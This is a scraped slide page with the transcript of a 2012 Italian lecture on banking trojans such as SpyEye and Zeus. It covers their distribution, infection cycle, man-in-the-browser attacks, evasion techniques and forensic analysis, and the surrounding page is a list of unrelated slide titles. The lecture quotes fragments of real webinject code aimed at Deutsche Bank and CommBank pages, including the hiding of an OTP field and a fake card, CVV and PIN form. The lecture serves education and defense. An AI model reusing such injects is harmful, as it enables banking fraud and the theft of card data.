Malware Bancario I NTRODUZIONE A L C RIMEWARE NEL S ETTORE B ANCARIO PRESI NELLA RETE - C OLLEGIO GHISLIERI 23 N OVEMBRE 2012 Dott. Francesco Schifilliti.

Slides:



Advertisements
Presentazioni simili
LEGAL INFORMATION ON THE WEB: THE ITALIAN SITUATION
Advertisements

Giovanni Falcone & Paolo Borsellino.
The standard CDF-GUI client submits the job to the LcgCAF head node which is the CDF-UI. This delegates the job to the Resource Broker component. The Resource.
TIPIZZAZIONE MOLECOLARE DI CLOSTRIDIUM DIFFICILE
Elaborazione del Book Informatico
1 Teaching Cloud Computing and Windows Azure in Academia Domenico Talia UNIVERSITA DELLA CALABRIA & ICAR-CNR Italy Faculty Days 2010.
Approfondimenti sui Microsoft Security Bulletin febbraio 2005 Feliciano Intini Andrea Piazza Mauro Cornelli Premier Center for Security - Microsoft Services.
A. Oppio, S. Mattia, A. Pandolfi, M. Ghellere ERES Conference 2010 Università Commerciale Luigi Bocconi Milan, june 2010 A Multidimensional and Participatory.
EUROPA TERRA DI MISSIONE. Flags of Europe This page contains flags and maps for Europe and its countries. European Union MAPS Europe 1 -- no flag references.
EBRCN General Meeting, Paris, 28-29/11/20021 WP4 Analysis of non-EBRCN databases and network services of interest to BRCs Current status Paolo Romano Questa.
DG Ricerca Ambientale e Sviluppo FIRMS' FUNDING SCHEMES AND ENVIRONMENTAL PURPOSES IN THE EU STRUCTURAL FUNDS (Monitoring of environmental firms funding.
VOICE and MOISE Projects - Madrid I PROGETTI VOICE E MOISE Presentazione di Giuliano Pirelli European Commission Joint Research Centre Institute for the.
Il progetto REZIPE a Bolzano Benjamin Auer (Ökoinstitut Südtirol/Alto Adige)
Udine 1 Udine – Richieste Attivamente coinvolti totali 3FTE M.P.Giordani, P.Palestri, L.Selmi A.Micelli (dottorando) A.Cristofoli (laureando.
1.E un algoritmo ricorsivo: Tutti le istanze di oggetti raggiungibili da un oggetto persistente diventano anchessi persistenti.
Un DataBase Management System (DBMS) relazionale client/server.
Microsoft Robotics Studio Marco Petrucco Microsoft Student Partner - Udine.
EJB Enterprise Java Beans B. Pernici. Approccio Java.
J0 1 Marco Ronchetti - Corso di Formazione Sodalia – Febbraio 2001 – Modulo Web Programming Tomcat configuration.
Chiara Carlucci - Isfol 15 giugno 2007 CDS Isfols specialised documentation centre.
Directory services Directory offline –Elenchi telefonici –Guide TV –Cataloghi acquisti Directory online –Application specific (lotus notes, MS Exchange.
LInnovazione di Prodotto. Lo sviluppo di nuovi prodotti e nuovi servizi: una vecchia sfida per le imprese innovative. [emilio bellini]
Comunicazione on-line, reti e virtualità Matteo Cristani.
Infrastruttura & Competenze ICT ENEA
Fanno ormai parte della nostra vita di tutti i giorni….
Università La Sapienza Ingegneria del Software I 1 Ingegneria del software I Seminario 2: Microsoft.NET.
Magnetochimica AA Marco Ruzzi Marina Brustolon
Nanoscience Laboratory Silicon nanophotonics Metamaterials Nanobiotechnologies, antioxidants and human health Few lab members.
VARO SRL LOGISTIC, QUALITY, SERVICE
ATE / 31 Lezione 3 i sistemi automatici di misurazione - gli ATE.
Institute for Atmospheric Pollution – EKOLab Consiglio Nazionale delle Ricerche Environmental Terminology Workshop 2 nd Ecoterm Group Meeting UBA - Umweltbundesamt.
SQL Server 2012 LocalDB.
Le tecniche informatiche per la sottrazione di dati riservati
Palermo, may 2010 F.Doumaz, S.Vinci (INGV-CNT- Gruppo di telerilevamento)
Ischia, giugno 2006Riunione Annuale GE 2006 Exploiting the Body Effect to Improve Analog CMOS Circuit Performances *P. Monsurrò, **S. Pennisi, *G.
COLACIO. J SLIDES PRESENTA APRI LAUDIO Colacio.j 001 Clicca per cambiare diapositiva.
La Cooperativa Sociale Le Sagome nasce nel dicembre 2005, grazie ad un progetto finanziato in parte dal fondo sociale europeo, coordinato e guidato da.
Procedure ITR02 web da effettuarsi come administrator del PC
POSTA ELETTRONICA PER GLI STUDENTI DI ECONOMIA POSTA SU HOST b Host e terminali La base dati dei messaggi risiede sul mainframeLa base dati dei messaggi.
Socrates - Grundtvig D E S I G N I N G I N C L U S I V E S P O R T A C T I V I T I E S F A C I L I T I E S Questa presentazione può essere.
CHI SIAMO è una società di consulenza. Il nostro CORE BUSINESS è costituito dallattività di: PROJECT MANAGEMENT, SYSTEM INTEGRATOR in ambiente SAP WEB.
Last quarter work and future activities
DIRITTO INTERNAZIONALE a.a Le caratteristiche del diritto internazionale Ordinamento coerente e tendenzialmente completo Struttura anorganica.
Installazione di Drupal su Linux (sistemista) Installazione step-by-step e note.
Internet Explorer 8.0: Architettura e funzionalità di sicurezza Renato Francesco Giorgini Evangelist IT Pro
IBM Lotus Notes e Domino
Comunicatore digitale
20 maggio 2002 NETCODE Set up a thematic network for development of competence within the Information Society.
LINGUISTICA GENERALE E COMPUTAZIONALE, PARTE 2
Analysis and Development of Functions in REST Logic: Application to the «DataView» Web App UNIVERSITA’ DEGLI STUDI DI MODENA E REGGIO EMILIA DIPARTIMENTO.
Negli ultimi anni, la richiesta di poter controllare in remoto la strumentazione e cresciuta rapidamente I miglioramenti nell’hardware e nel software insieme.
YOUR ITALIAN CV Step-by-step guide to create CURRICULUM VITAE in Italian language.
Sistemi di elaborazione dell’informazione Modulo 3 -Protocolli applicativi Unità didattica 4 - Protocolli del Web Ernesto Damiani Lezione 3 – Esempi HTTP.
Scopo del Cento Qualità d’Ateneo Il Centro per la Qualità della ricerca scientifica dell’UNO è costituito al fine di promuovere la cultura della Gestione.
Documentazione assistita di ABMs (Agent-Based Models)
Sicurezza II, A.A. 2011/2012 OpenID Speaker: André Panisson, PhD student Università degli Studi di Torino, Computer Science Department Corso Svizzera,
Corso di Statistica e Gestione delle Imprese Insegnamento: MARKETING Docente: Roberto Grandinetti Università di Padova Cap. 2 - Dal marketing di massa.
Pubblicazione di un sito web Punti Principali: ×Introduzione al protocollo FTP ×Servizi Hosting gratuiti ×Servizi Hosting a pagamento ×Guida all’uso di.
Alessandra De Cugis Progetto Tempi e Orari del Comune di Milano Time in the cities, a holistic approach for urban time issues, the case of Milan Paper.
Il virus è trasmesso dalla zanzara del genere Aedes Paesi con trasmissione locale confermata (dato aggiornato al 20/01/2016) Brasile, Bolivia, Barbados,
Rilievo in campo Catasto Strade e buche stradali della Provincia di Salerno.
Sistemi Informativi Territoriali (GIS) e Software libero
App-to-Cloud Security
2nd ONE-DAY INTERNATIONAL CONFERENCE
POSSIBLE ANSWERS The company is looking for a secretary/A secretarial position is vacant/A position as a secretary is vacant BBJ Co. Ltd advertised for.
Portal Architecture Data Management
ONEDATA - distributed data caching -
PhD Theses Institutional Archive Unitn-eprints PhD Upload, mandatory deposit and copyright issues at Unitn Highlights DRSBA. Ufficio Anagrafe della ricerca,
Studente : Andrea Cassarà Classe: 5AII A.S. 2014/2015 Link Sito
Panoramica Prodotti Avast Business Soluzioni Avast Endpoint Protection aziendali Avast Confidential.
Transcript della presentazione:

Malware Bancario I NTRODUZIONE A L C RIMEWARE NEL S ETTORE B ANCARIO PRESI NELLA RETE - C OLLEGIO GHISLIERI 23 N OVEMBRE 2012 Dott. Francesco Schifilliti

C OS È UN B ANKING T ROJAN ? 001 This term refers to the subset of malware seeking to steal/theft data from electronic bank accounts. Within this context, other financial services such as, for instance, online stock exchange operations are also considered electronic banking.

Zeus, SpyEye… e tanti altri 002

Soggetti (minimi) Coinvolti 003

Malware Developing 004

Malware Distribution 005 User ?

Malware Distribution 006 Pay-per-Install Drive-by-Download Exploit-as-a-Services

Ciclo Pay-per-Install 007 Exploit-as-a-Services

Fase di Infezione e Controllo 008 Exploit Pack Compromised Web Site Infection Mail di Spam

Iterando il processo dInfezione… 009 Flat BotnetP2P Botnet

Ciclo dInfezione di un Malware sul PC 010 Infezione sul Disco (ad es. SpyEye copia il file C:\cleansweep.ex e) Rendere Persistent il MW (ad es. con la modifica del registry) Injection (generalmente sul processo Explorer) Estensione della Injection (generalmente con tecniche di Hooking in Userland) Connessione persistente col Server di C&C

Odore di $$$ 011 User data theft data & session theft

Man in the Browser 012 Kernel- land User- land

Anti-Detection/Deception Techniques MW Code 013 Anti Memory Anti Emulation Anti Debugging Anti Disassembler Cryptography Packing & Protecting Obfuscation

Struttura di SpyEye 014 P P Binary Plugin del Malware: config.dat, ccgrabber collectors, sock5 customconnector webinjectors.txt Plugin del Malware: config.dat, ccgrabber collectors, sock5 customconnector webinjectors.txt Packer Obfuscation Anti-Dbg C&C

Un pezzettino di Webinjector di uno SpyEye ….. set_url * meine.deutsche-bank.de /trxm/db/*european.transfer.enter.data* GP data_before <body data_end data_inject style="visibility:hidden data_end data_after id= data_end data_before data_end data_inject if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';} data_end data_after data_end …..

Un pezzettino di Webinjector di un ATS 016 ….. set_url * commbank.com.au /netbank/UserMaintenance* GP data_before *My Q* data_end data_inject window.onload = function() { for ( i=0; i < document.links.length; i++ ) if (document.links[i].id != 'H_LogOffLink' && document.links[i].id != 'ctl00_HeaderControl_LogOffLink) document.links[i].onclick = function() { return false; }; }; var clck_counter = 0; function msg() { clck_counter++; if (clck_counter==2) { document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden; document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true; document.getElementById('error').style.top = 42; document.getElementById('error').style.left = 42; document.getElementById('error').style.visibility = "visible; document.getElementById('error').style.display = "block; } return false; } …..

Webinject in Chiaro nella RAM #inject { display: none; }.ui-dialog { width: 400px; font-size: 11px; }.ui-dialog.ui-dialog-titlebar-close { visibility: hidden; }.ui-dialog.ui-dialog-titlebar { visibility: hidden; display: none; } P ıº| Ó Ω |HÓ Ω |pÓ Ω |òÓıº|¿Ó Ω |ËÓ˘º|Ô˙º|8Ô˙º|`ÔπàÔπÔÿÔ–·Ô value=unescape(document.cookie.substring(offset, end)) jQuery("#inject_cc").focus(); } else if (jQuery("#inject_expdate_mm").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus(); } else if (jQuery("#inject_expdate_yy").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus(); } else if (jQuery("#inject_cvv").val().length < 3) { alert('Please enter correct CVV'); jQuery("#inject_cvv").focus(); } else if (jQuery("#inject_pin").val().length < 5) { ……. 017

SpyEye: esempio di MW modulare e parametrico 018 User Cosa/Come Rubare è definito in base ai Plugin Installati sulla Bot. billinghammer.dll_5f00ca c15ebe2e682a19e8c9 bugreport.dll_a6c c1550db437aac86d4ffdad ccgrabber.dll_5b a6e8f eb88be39df creditgrab.dll_0e0c1855fa82ca3ad20bbe b2 ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a a5 Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe b2 rdp.dll_0cb722049e024f2366ba9c187cb3929f ddos.dll_716d daa5e2a e9a77 … su Quale Banca/Ist. Finanziario fare operazioni in Frode è definito in webinjectors.txt a Chi Trasmettere i dati collezionati dal MW è definito in collectors.txt

Uno Schema di Riferimento dellAnalisi 019 Forensic Ananlysis Disk Analysis MW Searching Reg. Analysis Browser Analysis File Analysis Hash Comparing Entropy Analysis MW Analysis De- Anti- XYZ DisasseblingDebugging Memory Dumping Live Analysis Network Analysis Memory Analysis PIENA COMPRENSIONE DEL FORENSIC ARTIFACT

GRAZIE Francesco Schifilliti